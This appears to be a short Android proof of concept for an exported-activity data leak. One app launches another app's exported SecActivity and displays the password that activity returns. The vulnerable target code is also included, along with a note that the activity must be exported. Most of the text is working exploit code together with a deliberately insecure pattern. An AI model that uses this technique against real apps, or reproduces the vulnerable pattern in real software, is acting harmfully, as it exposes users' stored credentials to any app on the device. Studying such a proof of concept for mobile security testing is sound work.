exportedactivityleakexploit.java

package com.adon.exploitcors;

import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {

    int LAUNCH_SECOND_ACTIVITY = 1;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);


        Intent myIntent = new Intent();
        myIntent.setClassName("com.adon.cors", "com.adon.cors.SecActivity");


        startActivityForResult(myIntent,LAUNCH_SECOND_ACTIVITY);
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);

        if (requestCode == LAUNCH_SECOND_ACTIVITY) {

                String result=data.getStringExtra("result");

                Toast.makeText(MainActivity.this,result, Toast.LENGTH_LONG).show();
            }
        }
    }

Vulnerable Code:

public class SecActivity extends AppCompatActivity {

    Button b1, b2, b3;
    private WebView wview;
    TextView tview;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_second);

        tview = (TextView) findViewById(R.id.textView);
        String password = (String) tview.getText();
        Intent returnIntent = new Intent();
        returnIntent.putExtra("result",password);
        setResult(SecActivity.RESULT_OK,returnIntent);
        finish();

    }

}

---

The activity must be exported="true"

---